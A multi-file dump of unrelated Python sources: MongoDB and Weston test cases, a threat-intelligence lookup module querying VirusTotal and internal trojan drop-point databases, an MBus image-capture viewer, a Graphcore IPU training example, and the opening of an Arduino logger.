self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
coll.insert({'foo': 'bar'})
self.assertEqual(1, coll.find({'foo': 'bar'}).count())
self.assertTrue(coll.find({'foo': 'bar'}))
coll.remove({'foo': 'bar'})
self.assertEqual(0, coll.find({'foo': 'bar'}).count())
c.safe = False
c.unset_lasterror_options()
self.assertFalse(self.client.slave_okay)
self.assertTrue(bool(self.client.read_preference))
self.assertFalse(self.client.safe)
self.assertEqual({}, self.client.get_lasterror_options())
def test_document_class(self):
c = MasterSlaveConnection(self.master, self.slaves)
db = c.pymongo_test
w = 1 + len(self.slaves)
db.test.insert({"x": 1}, w=w)
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c = MasterSlaveConnection(self.master, self.slaves, document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
def test_tz_aware(self):
dt = datetime.datetime.utcnow()
client = MasterSlaveConnection(self.master, self.slaves)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
w = 1 + len(self.slaves)
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=True)
self.assertEqual(True, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(utc, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=False)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
if __name__ == "__main__":
unittest.main()
|
weston.py
|
#
# SPDX-License-Identifier: MIT
#
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
from oeqa.runtime.decorator.package import OEHasPackage
import threading
import time
class WestonTest(OERuntimeTestCase):
weston_log_file = '/tmp/weston.log'
@classmethod
def tearDownClass(cls):
cls.tc.target.run('rm %s' % cls.weston_log_file)
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['weston'])
def test_weston_running(self):
cmd ='%s | grep [w]eston-desktop-shell' % self.tc.target_cmds['ps']
status, output = self.target.run(cmd)
msg = ('Weston does not appear to be running %s' %
self.target.run(self.tc.target_cmds['ps'])[1])
self.assertEqual(status, 0, msg=msg)
def get_processes_of(self, target, error_msg):
status, output = self.target.run('pidof %s' % target)
self.assertEqual(status, 0, msg='Retrieve %s (%s) processes error: %s' % (target, error_msg, output))
return output.split(" ")
def get_weston_command(self, cmd):
return 'export XDG_RUNTIME_DIR=/run/user/0; export WAYLAND_DISPLAY=wayland-0; %s' % cmd
def run_weston_init(self):
self.target.run(self.get_weston_command('weston --log=%s' % self.weston_log_file))
def get_new_wayland_processes(self, existing_wl_processes):
try_cnt = 0
while try_cnt < 5:
time.sleep(5 + 5*try_cnt)
try_cnt += 1
wl_processes = self.get_processes_of('weston-desktop-shell', 'existing and new')
new_wl_processes = [x for x in wl_processes if x not in existing_wl_processes]
if new_wl_processes:
return new_wl_processes, try_cnt
return new_wl_processes, try_cnt
@OEHasPackage(['weston'])
def test_weston_info(self):
status, output = self.target.run(self.get_weston_command('weston-info'))
self.assertEqual(status, 0, msg='weston-info error: %s' % output)
@OEHasPackage(['weston'])
def test_weston_can_initialize_new_wayland_compositor(self):
existing_wl_processes = self.get_processes_of('weston-desktop-shell', 'existing')
existing_weston_processes = self.get_processes_of('weston', 'existing')
weston_thread = threading.Thread(target=self.run_weston_init)
weston_thread.start()
new_wl_processes, try_cnt = self.get_new_wayland_processes(existing_wl_processes)
existing_and_new_weston_processes = self.get_processes_of('weston', 'existing and new')
new_weston_processes = [x for x in existing_and_new_weston_processes if x not in existing_weston_processes]
for w in new_weston_processes:
self.target.run('kill -9 %s' % w)
__, weston_log = self.target.run('cat %s' % self.weston_log_file)
self.assertTrue(new_wl_processes, msg='Could not get new weston-desktop-shell processes (%s, try_cnt:%s) weston log: %s' % (new_wl_processes, try_cnt, weston_log))
|
datasource.py
|
__author__ = 'beepi'
from queryable import *
import requests
import time
from datetime import datetime
from math import ceil
from Queue import Queue, Empty
from threading import Thread
class PrivateVTQueryable(Queryable):
_alias = "vtpriv"
_name = 'VirusTotal - Private API'
def get_hash_info(self, q, results_list):
'''
Gets each and every hash information from VT's API
:return: List
'''
hashes_list = []
# My preferred AV's priority
engines_list = ['Microsoft', 'TrendMicro', 'Symantec', 'ESET-NOD32', 'McAfee']
while q.qsize() > 0:
for i in range(25):
try:
hashes_list.append(q.get_nowait())
except Empty:
break
params = {'apikey': self.settings['api_key'], 'resource': ','.join(hashes_list)}
response = requests.get('https://www.virustotal.com/vtapi/v2/file/report', params=params)
json_response = response.json()
# If one result returned - put it in a list
if isinstance(json_response, dict):
# When searching for hash only, verify it exists first
if response_json['response_code'] <= 0 :
return None
json_response = [json_response,]
for item in json_response:
hash_id = item['scan_id']
hash_scan_date = item['scan_date']
hash_permalink = item['permalink']
hash_positives = item['positives']
hash_total = item['total']
formatted_scan_date = datetime.strptime(hash_scan_date, '%Y-%m-%d %H:%M:%S')
hash_result = None
# Looking for the most suitable AV generic signature of the hash
for engine in engines_list:
try:
if item['scans'][engine]['result']:
hash_result = [engine, item['scans'][engine]['result']]
break
# Catch KeyError in case engine doesn't exists
except KeyError:
continue
r = Record()
r.id = hash_id
r.datetime = time.mktime(formatted_scan_date.timetuple())
r.description = 'Unknown'
r.data = 'Detection Ratio: {}/{}\n' \
'Permalink: {}'.format(hash_positives, hash_total, hash_permalink),
# Add description if hash was detected by one of the major AVs
if hash_result:
r.description = '{} detected it as {}'.format(hash_result[0], hash_result[1])
results_list.append(r)
def _query(self, phrase):
'''
Implement the way we search through VT's Private API
:return: List
'''
q = Queue()
workers_list = []
results_list = []
if phrase.type == QueryPhrase.TYPE_HASH:
q.put(phrase.data)
# Using VT's search API for anything that isn't of type hash
else:
params = {'apikey': self.settings['api_key'], 'query': phrase.data}
response = requests.get('https://www.virustotal.com/vtapi/v2/file/search', params=params)
response_json = response.json()
if response_json['response_code'] <= 0 :
return None
for hash in response_json['hashes'][:self.settings['max_results']]:
q.put(hash)
# Calculates number of threads needed (1 thread for each 25 hashes)
num_threads = int(ceil(float(q.qsize())/25))
for i in range(num_threads):
worker = Thread(target=self.get_hash_info, args=(q, results_list))
workers_list.append(worker)
worker.start()
for w in workers_list:
w.join()
return results_list
import requests
import time
from datetime import datetime
class PublicVTQueryable(Queryable):
_alias = "vtpub"
_name = 'VirusTotal - Public API'
def parse_field(self, items, description, phrase_data):
'''
Parses all lines of one VT field and builds one record object out of it
:return: Queryable record object
'''
data = []
for item in items[:self.settings['max_results']]:
positives = item['positives']
total = item['total']
if 'scan_date' in item:
date = item['scan_date']
elif 'date' in item:
date = item['date']
else:
date = None
if 'url' in item:
resource = item['url'].replace('http://','hXXp://')
elif 'sha256' in item:
resource = item['sha256']
else:
resource = None
line = 'Detection: {}/{} | {date}Resource: {}'.format(positives, total, resource, date='{} | '.format(date) if date else '')
data.append(line)
data = '\n'.join(data)
r = Record()
r.description = description
r.data = data
r.id = ' - https://www.virustotal.com/en/search?query={}'.format(phrase_data)
r.datetime = 1
return r
def _query(self, phrase):
'''
Implement the way we search through VT's Public API
:return: List
'''
params = {'apikey': self.settings['api_key']}
if phrase.type == QueryPhrase.TYPE_IP:
params['ip'] = phrase.data
url = 'https://www.virustotal.com/vtapi/v2/ip-address/report'
elif phrase.type == QueryPhrase.TYPE_DOMAIN:
params['domain'] = phrase.data
url = 'https://www.virustotal.com/vtapi/v2/domain/report'
elif phrase.type == QueryPhrase.TYPE_URL:
params['resource'] = phrase.data
url = 'https://www.virustotal.com/vtapi/v2/url/report'
elif phrase.type == QueryPhrase.TYPE_HASH:
#raise ValueError("Please use VT Private API for hash lookup")
return None
elif phrase.type == QueryPhrase.TYPE_MAIL:
#raise ValueError("VT Public API doesn't support email format")
return None
else:
return None
response = requests.get(url, params=params)
response_json = response.json()
if response_json['response_code'] <= 0 :
return None
results_list = []
fields = {
'detected_urls': 'Latest URLs hosted in this IP address',
'detected_communicating_samples': 'Latest detected files that communicate with this IP address',
'detected_downloaded_samples': 'Latest detected files that were downloaded from this IP address',
'detected_referrer_samples': 'Latest detected files that embed this IP address in their strings',
'undetected_communicating_samples': 'Latest undetected files that communicate with this IP address',
'undetected_downloaded_samples': 'Latest undetected files that were downloaded from this IP address',
'undetected_referrer_samples': 'Latest undetected files that embed this IP address in their strings',
}
for field, desc in fields.iteritems():
try:
field = response_json[field]
r = self.parse_field(field, desc, phrase.data)
results_list.append(r)
except KeyError:
continue
# If no significant information found in VT, returns resource's detection ratio
if not results_list:
try:
resource_id = response_json['scan_id']
resource_scan_date = response_json['scan_date']
hash_permalink = response_json['permalink']
resource_positives = response_json['positives']
resource_total = response_json['total']
formatted_scan_date = datetime.strptime(resource_scan_date, '%Y-%m-%d %H:%M:%S')
r = Record()
r.id = resource_id
r.datetime = time.mktime(formatted_scan_date.timetuple())
r.description = 'Detection Ratio: {} / {}'.format(resource_positives, resource_total)
#r.data = 'Permalink: https://www.virustotal.com/en/search?query={}'.format(phrase.data)
r.data = 'Permalink: {}'.format(hash_permalink)
results_list.append(r)
except ValueError:
return None
return results_list
import requests
import time
from datetime import datetime
class FWatchPortalQueryable(Queryable):
_alias = "portal"
_name = 'FirstWatch Threat Portal'
def _query(self, phrase):
'''
Implement the way we search through FirstWatch Threat Portal
:return: List
'''
portal_api = 'http://{}:{}/api/record/get'.format(self.settings['host_ip'], self.settings['host_port'])
params = {'token': self.settings['token'], 'resource': phrase.data}
response = requests.get(portal_api, params=params)
if response.text == 'found 0 matching records':
return None
response_json = response.json()
results_list = []
for collection in response_json[:self.settings['max_results']]:
collection_name = collection['collection']
for record in collection['data']:
threat_id = record['_id']['$oid']
threat_date_added = (record['date_added']['$date'] / 1000)
formatted_date_added = datetime.fromtimestamp(threat_date_added)
threat_description = record['threat_description']
threat_category = record['threat_category']
threat_source = record['threat_source']
comments = ''
for comment in record['comments']:
comments += '\n"{}" commented by {}'.format(comment['text'], comment['author'])
r = Record()
r.id = threat_id
r.datetime = time.mktime(formatted_date_added.timetuple())
r.description = 'Found in collection: {}'.format(collection_name)
r.data = 'Threat Description: {}\nThreat Category: {}\nThreat Source: {}\n{}'.format(threat_description, threat_category, threat_source, comments)
results_list.append(r)
return results_list
import MySQLdb
import MySQLdb.cursors
class ATSIncQueryable(Queryable):
_alias = "atsinc"
_name = 'ATSInc'
def build_select(self, data):
'''
Building the select query for MYSQL database
:return:
SQL query as Format String
SELECT fields in a Tuple
'''
select_tuple = ()
columns = ['host_drop', 'host_ip', 'drop_url', 'infection_url', 'config_url', 'md5', 'analysis', 'comments']
query = 'SELECT {0}.id, {0}.create_date, {0}.drop_url, trojan_family.family_name ' \
'FROM {1}.{0} ' \
'LEFT JOIN {1}.trojan_family ' \
'ON {0}.trojan_family_id = trojan_family.id ' \
'WHERE '.format(self.settings['table'], self.settings['db'])
for field in columns:
select_tuple += ('%{}%'.format(data),)
query += '({} LIKE %s)'.format(field)
if field != columns[-1]:
query += ' OR '
query += 'LIMIT {}'.format(self.settings['max_results'])
return query, select_tuple
def _query(self, phrase):
'''
Implement the way we search through ATSInc
:return: List
'''
# Avoid searching for phrase less than 4 chars
if len(phrase.data) < 4:
#raise ValueError('Phrase must be at least 4 characters long')
return None
db = MySQLdb.connect(self.settings['host'], self.settings['user'], self.settings['pass'], self.settings['db'],
cursorclass=MySQLdb.cursors.DictCursor)
cur = db.cursor()
query, select_tuple = self.build_select(phrase.data)
cur.execute(query, select_tuple)
rows = cur.fetchall()
results_list = []
for row in rows:
row_id = int(row['id'])
row_creation_date = row['create_date']
row_trojan_family = row['family_name']
row_drop_url = row['drop_url'].replace('http://','hXXp://')
r = Record()
r.id = row_id
r.datetime = time.mktime(row_creation_date.timetuple())
r.description = 'Resource related to {} Trojan'.format(row_trojan_family)
r.data = 'Drop-Point URL: {}'.format(row_drop_url)
results_list.append(r)
return results_list
import ast
import re
import urllib2
from urllib import urlencode
class SpartaQueryable(Queryable):
_alias = "sparta"
_name = 'Sparta'
def basic_auth_connect(self, url, username, password):
'''
Implement an HTTP basic auth connection for req_solr
:return: urllib2 response object
'''
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, url, username, password)
auth_handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
conn = urllib2.urlopen(url)
return conn
def add_get_params(self, select, fields="*", resp_format="python"):
get_params = {'qt': 'dist',
'q': select,
'fl': fields,
'rows': self.settings['max_results'],
'wt': resp_format,
'omitHeader': 'true'
}
get_params = urlencode(get_params)
return get_params
def req_solr(self, get_params):
'''
Implement the way we query Apache Solr
:return: database response as Dict
'''
url = self.settings['url'] + "/select?" + get_params
conn = self.basic_auth_connect(url,self.settings['user'],self.settings['pass'])
response = ast.literal_eval(conn.read())
if response['response']['numFound']:
return response
def _query(self, phrase):
'''
Implement the way we search through Sparta
:return: List
'''
query = "domain:{0} OR host:{0} OR ip:{0} OR url:{0} OR dropPointUrl:{0} OR emails:{0}".format(re.escape(phrase.data))
get_params = self.add_get_params(query, "id, creationDate, trojanFamilyName, dropPointUrl, stolenDate")
sparta_result = self.req_solr(get_params)
if sparta_result:
results_list = []
for document in sparta_result['response']['docs']:
doc_id = document['id']
doc_creation_date = document['creationDate']
doc_trojan_type = document['trojanFamilyName']
doc_drop_url = document['dropPointUrl'].replace('http://','hXXp://')
doc_stolen_date = document['stolenDate']
formatted_stolen_date = datetime.strptime(doc_stolen_date, '%Y-%m-%dT%H:%M:%SZ')
try:
formatted_creation_date = datetime.strptime(doc_creation_date, '%Y-%m-%dT%H:%M:%S.%fZ')
except ValueError:
formatted_creation_date = datetime.strptime(doc_creation_date, '%Y-%m-%dT%H:%M:%SZ')
r = Record()
r.id = doc_id
r.datetime = time.mktime(formatted_creation_date.timetuple())
r.description = 'Resource related to {} Trojan'.format(doc_trojan_type)
r.data = 'Exfiltrated data sent to URL: {} @ {}'.format(doc_drop_url, formatted_stolen_date)
results_list.append(r)
return results_list
'''
class ExampleFeedQueryable(Queryable):
_alias = "example"
_name = 'Example Feed'
def _query(self, data):
Your logic goes here...
for item in list:
r = Record()
r.id = 1234
r.datetime = '1234567890'
r.description = 'Found indication evilness all over'
r.data ='Evil data is evil'
results_list.append(r)
return results_list
'''
|
goc_to_image.py
|
#!/usr/bin/env python2
import argparse
import csv
from pprint import pprint
import os
import struct
import sys
import time
import threading
import queue
import numpy as np
import pygame
import pygame.fastevent
from pygame.locals import *
import m3_common
from m3_logging import get_logger
logger = get_logger(__name__)
rotate_90 = True
################################################################################
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', default=None,
help="Read image data from a file saved from a Saleae capture")
parser.add_argument('-s', '--serial', default=None,
help="Snoop image data via an ICE board on this serial port")
parser.add_argument('-a', '--address',
type=lambda x: int(x, 0),
default=(0x17,),
nargs='+',
help="MBus address(es) image data is sent to")
parser.add_argument('-o', '--output-directory',
default='goc-img-'+time.strftime('%Y-%m-%d--%H-%M-%S'),
help="Save images into this directory")
parser.add_argument('-p', '--pixels', type=int, default=160,
help="Number of pixels in a single row of the image")
parser.add_argument('-m', '--multiplier', type=float, default=1.0,
help="Multiple each raw pixel value by this amount")
parser.add_argument('-l', '--scale', type=int, default=4,
help="Multiplier to scale the image")
parser.add_argument('-H', '--hot-pixel-map', default=None,
help="Dark image with a few 'hot' pixels to remove and average with neighbors")
parser.add_argument('--hot-pixel-threshold', type=int, default=25,
help="Pixels at or above this value will be considered hot")
args = parser.parse_args()
if args.file is None and args.serial is None:
print("Error: Must specify one of -f or -s")
print("")
parser.print_help()
sys.exit(1)
if args.file is not None and args.serial is not None:
print("Error: Can only specify one of -f or -s")
print("")
parser.print_help()
sys.exit(1)
os.mkdir(args.output_directory)
################################################################################
hot_pixel_map = np.zeros((args.pixels,args.pixels), bool)
hot_pixel_list = []
if args.hot_pixel_map:
for i,row in enumerate(csv.reader(open(args.hot_pixel_map))):
for j,pixel in enumerate(map(int, row)):
if pixel >= args.hot_pixel_threshold:
hot_pixel_map[i, j] = True
hot_pixel_list.append((i,j))
################################################################################
pygame.init()
option_divider_height = 2 * args.scale
option_text_height = 20 * args.scale
window_width = args.pixels * args.scale
window_height = args.pixels * args.scale + option_divider_height + option_text_height
windowSurfaceObj = pygame.display.set_mode((window_width,window_height))
pygame.display.set_caption('GOC Test')
gocSurfaceObj = windowSurfaceObj.subsurface((0, 0, args.pixels * args.scale, args.pixels * args.scale))
RED = pygame.Color(255, 0, 0)
GREEN = pygame.Color( 0, 255, 0)
BLUE = pygame.Color( 0, 0, 255)
WHITE = pygame.Color(255, 255, 255)
BLACK = pygame.Color( 0, 0, 0)
colors = [pygame.Color(x,x,x) for x in range(256)]
colors.insert(0, RED)
# http://stackoverflow.com/questions/17202232/even-with-pygame-initialized-video-system-not-initialized-gets-thrown
# possible cygwin fix?
pygame.fastevent.init()
class Option(object):
hovered = False
def __init__(self, text, pos):
self.text = text
self.pos = pos
self.set_rect()
self.draw()
def __setattr__(self, name, value):
if name == 'hovered':
pygame.display.update(self.rect)
object.__setattr__(self, name, value)
def draw(self):
self.set_rend()
windowSurfaceObj.blit(self.rend, self.rect)
def set_rend(self):
self.rend = options_font.render(self.text, True, self.get_color())
#self.rend = options_font.render(self.text, False, self.get_color())
def get_color(self):
if self.hovered:
return (255, 255, 255)
else:
return (100, 100, 100)
def set_rect(self):
self.set_rend()
self.rect = self.rend.get_rect()
self.rect.topleft = self.pos
def onClick(self):
try:
self.on_click()
except AttributeError:
pass
options_font = pygame.font.Font(None, option_text_height)
options = {
'prev' : Option("PREV", (10*args.scale + -10*args.scale, args.pixels*args.scale + option_divider_height)),
'save' : Option("SAVE", (10*args.scale + 50*args.scale, args.pixels*args.scale + option_divider_height)),
'next' : Option("NEXT", (10*args.scale + 110*args.scale, args.pixels*args.scale + option_divider_height)),
}
options_divider = pygame.Rect(0, args.pixels*args.scale, window_width, option_divider_height)
windowSurfaceObj.fill(BLUE, options_divider)
################################################################################
def get_addr17_msg_file():
data = []
searching = True
for line in open(args.file):
line = line.strip()
if searching:
if line in ['Address {:x}'.format(a) for a in args.address]:
searching = False
continue
if line.split()[0] == 'Data':
data.append(int(line.split()[1], 16))
continue
yield data
data = []
if line not in ['Address {:x}'.format(a) for a in args.address]:
searching = True
serial_queue = queue.Queue()
def get_addr17_msg_serial():
while True:
addr, data = serial_queue.get()
addr = int(addr.encode('hex'), 16)
if addr in args.address:
data = list(map(ord, data))
yield data
else:
logger.debug("bad addr {:x}".format(addr))
def Bpp_callback(address, data):
serial_queue.put((address, data))
class preparsed_snooper(m3_common.mbus_snooper):
def __init__(self, args, *pyargs, **kwargs):
self.args = args
super(preparsed_snooper,self).__init__(*pyargs, **kwargs)
def parse_args(self):
self.serial_path = self.args.serial
if args.file:
get_addr17_msg = get_addr17_msg_file
else:
snooper = preparsed_snooper(args=args, callback=Bpp_callback)
get_addr17_msg = get_addr17_msg_serial
def is_end_of_image_msg(m):
if len(m) == 4:
data = struct.unpack(">I", struct.pack("BBBB", *m))[0]
data = data & 0x0000CFFF
if data == 0:
return True
return False
# Decent guess for now
def is_motion_detect_msg(m):
if len(m) == 4:
if not is_end_of_image_msg(m):
return True
def get_image_g(data_generator):
class UnexpectedAddressException(Exception):
pass
while True:
data = np.zeros((args.pixels,args.pixels), int)
end_of_image = False
# Grab an image
for row in range(args.pixels):
r = next(data_generator)
while is_motion_detect_msg(r):
print("Skipping motion detect message")
r = next(data_generator)
if is_end_of_image_msg(r):
print("Unexpected end-of-image. Expecting row", row + 1)
print("Returning partial image")
end_of_image = True
break
if len(r) != args.pixels:
print("Row %d message incorrect length: %d" % (row, len(r)))
print("Using first %d pixel(s)" % (min(len(r), args.pixels)))
for p in range(min(len(r), args.pixels)):
data[row][p] = r[p] + 1
while not end_of_image:
m = next(data_generator)
if is_end_of_image_msg(m):
break
print("Expected end-of-image. Got message of length:", len(m))
# If imager sends more rows than expected, discard this earliest
# received rows. Works around wakeup bug.
data = np.roll(data, -1, axis=0)
for p in range(min(len(m), args.pixels)):
data[-1][p] = m[p] + 1
if len(m) != args.pixels:
print("Extra row message incorrect length: %d" % (len(m)))
print("Zeroing remaining pixels")
for p in range(len(m), args.pixels):
data[-1][p] = 0
yield data
def correct_endianish_thing_old(data, array):
for row in range(args.pixels):
for colset in range(0, args.pixels, 4):
for i in range(4):
if rotate_90:
val = data[colset+3-i][row]
else:
val = data[row][colset+3-i]
val = int(val)
if (val):
val -= 1
color = pygame.Color(val, val, val)
rgb = gocSurfaceObj.map_rgb(color)
else:
rgb = gocSurfaceObj.map_rgb(RED)
array[row][colset+i] = rgb
def correct_endianish_thing(data, array):
for rowbase in range(0, args.pixels, 4):
for rowi in range(4):
for col in range(0, args.pixels):
if rotate_90:
val = data[col][rowbase + 3-rowi]
else:
val = data[rowbase + 3-rowi][col]
val = int(val)
val = int(val * args.multiplier)
if (val):
val -= 1
if val > 255:
logger.warn("Pixel value > 255, capping at 255")
val = 255
color = pygame.Color(val, val, val)
rgb = gocSurfaceObj.map_rgb(color)
else:
rgb = gocSurfaceObj.map_rgb(RED)
array[rowbase+rowi][col] = rgb
images_q = queue.Queue()
def process_hot_pixels(img):
img = img.copy()
if args.hot_pixel_map is None:
return img
ret = []
for hp in hot_pixel_list:
neighbors = []
for i in (-1,0,1):
for j in (-1, 0, 1):
if i == j == 0:
continue
try:
neighbors.append(img[hp[0]+i,hp[1]+j])
except IndexError:
pass
img[hp[0], hp[1]] = np.mean(neighbors)
return img
def get_images():
if args.file:
print("Processing static file")
images_g = get_image_g(get_addr17_msg_file())
for img in images_g:
hot = process_hot_pixels(img)
images_q.put((img, hot))
print("Done reading file")
event = pygame.event.Event(pygame.USEREVENT)
pygame.fastevent.post(event)
elif args.serial:
images_g = get_image_g(get_addr17_msg_serial())
for img in images_g:
hot = process_hot_pixels(img)
images_q.put((img, hot))
event = pygame.event.Event(pygame.USEREVENT)
pygame.fastevent.post(event)
print("ERR: Should never get here [serial image_g terminated]")
get_images_thread = threading.Thread(target=get_images)
get_images_thread.daemon = True
get_images_thread.start()
images = []
images_raw = []
def get_image_idx(idx):
global images
global images_raw
while True:
try:
raw,hot = images_q.get_nowait()
images_raw.append(raw)
images.append(hot)
except queue.Empty:
break
return images[idx]
################################################################################
pygame.event.set_allowed(None)
pygame.event.set_allowed((QUIT, KEYUP, MOUSEBUTTONUP, MOUSEMOTION))
goc_raw_Surface = pygame.Surface((args.pixels, args.pixels))
def render_raw_goc_data(data):
print("Request to render raw goc data")
print("Correcting pixel order bug")
surface_array = pygame.surfarray.pixels2d(goc_raw_Surface)
correct_endianish_thing(data, surface_array)
del surface_array
print("Scaling %d pixel --> %d pixel%s" % (1, args.scale, ('s','')[args.scale == 1]))
pygame.transform.scale(goc_raw_Surface, (args.pixels*args.scale, args.pixels*args.scale), gocSurfaceObj)
print("Rendering Image")
pygame.display.update()
print()
def render_image_idx(idx):
print("Request to render image", idx)
render_raw_goc_data(get_image_idx(idx))
def save_image(filename):
pygame.image.save(gocSurfaceObj, filename)
print('Image saved to', filename)
def save_image_hack():
imgname = "capture%02d.jpeg" % (current_idx)
imgname = os.path.join(args.output_directory, imgname)
save_image(imgname)
csvname = "capture%02d.csv" % (current_idx)
csvname = os.path.join(args.output_directory, csvname)
ofile = csv.writer(open(csvname, 'w'), dialect='excel')
ofile.writerows(get_image_idx(current_idx))
if args.hot_pixel_map:
raw_csvname = "raw_capture%02d.csv" % (current_idx)
raw_csvname = os.path.join(args.output_directory, raw_csvname)
raw_ofile = csv.writer(open(raw_csvname, 'w'), dialect='excel')
raw_ofile.writerows(images_raw[current_idx])
print('CSV of image saved to', csvname)
options['save'].on_click = save_image_hack
def advance_image():
global current_idx
current_idx += 1
try:
render_image_idx(current_idx)
save_image_hack()
except IndexError:
current_idx -= 1
print("At last image. Display left at image", current_idx)
print()
options['next'].on_click = advance_image
def rewind_image():
global current_idx
current_idx = max(0, current_idx-1)
render_image_idx(current_idx)
options['prev'].on_click = rewind_image
def quit():
pygame.quit()
sys.exit()
current_idx = -1
advance_image()
while True:
event = pygame.event.wait()
if event.type == QUIT:
quit()
if event.type == MOUSEBUTTONUP:
for option in list(options.values()):
if option.rect.collidepoint(pygame.mouse.get_pos()):
option.onClick()
if event.type == MOUSEMOTION:
for option in list(options.values()):
if option.rect.collidepoint(pygame.mouse.get_pos()):
option.hovered = True
else:
option.hovered = False
option.draw()
if event.type == KEYUP:
if event.key == K_RIGHT:
advance_image()
elif event.key == K_LEFT:
rewind_image()
elif event.key == K_RETURN:
save_image_hack()
elif event.key == K_ESCAPE:
quit()
if event.type == USEREVENT:
advance_image()
|
outfeed_example.py
|
from threading import Thread
from tensorflow.python import ipu
import tensorflow as tf
NUM_ITERATIONS = 100
#
# Configure the IPU system
#
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.configure_ipu_system()
#
# The input data and labels
#
def create_dataset():
mnist = tf.keras.datasets.mnist
(x_train, y_train), (_, _) = mnist.load_data()
x_train = x_train / 255.0
train_ds = tf.data.Dataset.from_tensor_slices(
(x_train, y_train)).shuffle(10000)
train_ds = train_ds.map(lambda d, l:
(tf.cast(d, tf.float32), tf.cast(l, tf.int32)))
train_ds = train_ds.batch(32, drop_remainder=True)
return train_ds.repeat()
#
# The host side queue
#
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
#
# A custom training loop
#
@tf.function(experimental_compile=True)
def training_step(num_iterations, iterator, in_model, optimizer):
for _ in tf.range(num_iterations):
features, labels = next(iterator)
with tf.GradientTape() as tape:
predictions = in_model(features, training=True)
prediction_loss = tf.keras.losses.sparse_categorical_crossentropy(
labels, predictions)
loss = tf.reduce_mean(prediction_loss)
grads = tape.gradient(loss, in_model.trainable_variables)
optimizer.apply_gradients(zip(grads, in_model.trainable_variables))
outfeed_queue.enqueue(loss)
#
# Execute the graph
#
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
# Create the Keras model and optimizer.
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10, activation='softmax')
])
opt = tf.keras.optimizers.SGD(0.01)
# Create an iterator for the dataset.
train_iterator = iter(create_dataset())
# Function to continuously dequeue the outfeed until NUM_ITERATIONS examples
# are seen.
def dequeue_thread_fn():
counter = 0
while counter != NUM_ITERATIONS:
for loss in outfeed_queue:
print("Step", counter, "loss = ", loss.numpy())
counter += 1
# Start the dequeuing thread.
dequeue_thread = Thread(target=dequeue_thread_fn, args=[])
dequeue_thread.start()
# Run the custom training loop over the dataset.
strategy.run(training_step,
args=[NUM_ITERATIONS, train_iterator, model, opt])
dequeue_thread.join()
|
ArduinoLogger.py
|
"""
____ ____ ____ _ ____ ____ __ __
| _ \ _ _ | _ \ / ___| | | ___ __ _ / ___|/ ___|\ \ / /
| |_) || | | || | | |\___ \ | | / _ \ / _` | _____ \___ \\___ \ \ \ / /
| __/ | |_| || |_| | ___) || || (_) || (_| | |_____| ___) |___) | \ V /
|_| \__, ||____/ |____/ |_| \___/ \__, | |____/|____/ \_/
|___/ |___/
"""
from PyDSlog.stream import ArduinoStream as stream # import Stream module
import threading
import time
import queue
import os
from datetime import datetime, timedelta
import sys
class Arduino_csv_saver:
def __init__(self, port, channels_to_use, frequency, block_size, filepath, filename=None, labeled=False, save_as_signal=False,
header=True, custom_header=None, add_tmp=None, date_format="%d/%m/%Y,%H:%M:%S", baudrate=115200, w_mode="a", delimiter=","):
self.generation_status = {0:"start", 1:"pause", 2:"stop", 3:"error"}
self.status = 1 # always the initial status
self.error_str = ""
self.run_label = "" # Set label to empty string. this are numbers that represent the machine state
self.values_count = 0
self.sem_1 = threading.Semaphore() # semaphore to savely read the mqtt global variables (run_label)
self.sem_2 = threading.Semaphore()
self.sem_3 = threading.Semaphore()
self.sem_4 = threading.Semaphore()
self.stream_thread_keepalive_flag = threading.Event() # this flag keeps the thread_read_stream alive as long end_csv() is not called
self.start_flag = threading.Event() # this flag control the generation of the csv file depending of the value of "run_cmd"
self.labeled = labeled
self.channels_to_use = channels_to_use # store the channels to use in loval variable.
self.frequency = frequency # store frequency in local variable
self.filename = filename # store filepath in local variable
self.filepath = filepath # the filepath where the files are stored
self.date_format = date_format # the date-time format for the timestamp, only used in normal csv file
self.add_tmp = add_tmp # add timestamp as row in normal csv file?
self.header = header # add header flag for normal csv
self.custom_header = custom_header # add custom header in normal csv file
self.delimiter = delimiter # the delimiter between values
self.mode = w_mode # file open mode. "a" or "w"
self.block_size = block_size # the size of the block that is readed at once from the stream
self.port = port # serial port
self.baudrate = baudrate # serial baudrate
self.save_as_signal = save_as_signal # save as signal or as normal csv file
self.stream_values = queue.Queue(0) # queue for storing the stream values. One thread put values and the other read the values. So we dont block
self.serial_con = None # serial connection. None at the beginning
self.thread_read_stream = threading.Thread(target=self.thread_read_channels, args=()) # thread for reading the stream
